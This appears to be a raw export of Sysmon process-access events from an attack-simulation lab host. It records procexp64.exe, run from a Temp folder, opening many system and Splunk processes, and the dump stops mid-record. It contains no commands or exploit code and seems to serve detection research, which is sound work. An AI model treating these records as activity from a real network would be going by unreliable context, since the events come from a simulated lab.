15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791758Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791757Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791756Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791755Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791754Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791753Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791752Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791751Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791750Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791749Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791748Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791747Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791746Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791745Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791744Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791743Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791742Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791741Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791740Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791739Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791738Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791737Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791736Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791735Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 